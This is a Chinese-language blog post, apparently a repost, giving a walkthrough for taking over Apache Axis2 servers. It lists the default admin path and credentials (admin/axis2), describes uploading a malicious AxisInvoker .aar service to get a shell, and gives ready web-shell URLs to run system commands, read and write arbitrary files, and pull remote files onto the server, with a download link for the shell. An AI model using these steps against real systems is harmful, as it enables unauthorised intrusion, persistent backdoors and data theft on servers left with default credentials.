Apache Axis2 后台文件上传getshell 漏洞复现

0x00 前言

Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写，并提供两种语言Java及C的开发版本。

事实上AXIS2 不只为WEB应用程序提供Web服务的界面，而且它也可以作为一个单独的服务器看待，而且很简单就能跟Apache Tomcat整合，目前AXIS2的最新版本是1.6.2。

Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。

0x01 漏洞复现

默认端口：8089

默认后台路径：/axis2-admin/login

默认账号密码：admin/axis2

选择Tools-“ Upload Service ”上传aar包进行 getshell

成功后会提示“ File AxisInvoker.aar successfully uploaded ”

http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig

0x02 使用方法

马子的使用方法：

支持的命令：
exec-运行命令，在Linux / Windows上均可使用，不用担心。
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
 
写-写文件
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
 
info-显示某些信息，根据需要进行修改
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
 
读取-读取文件内容
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
 
下载-下载文件并将其保存在某处
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

下载地址：https://github.com/CaledoniaProject/AxisInvoker

转载请注明：Adminxe's Blog » Apache Axis2 后台文件上传getshell 漏洞复现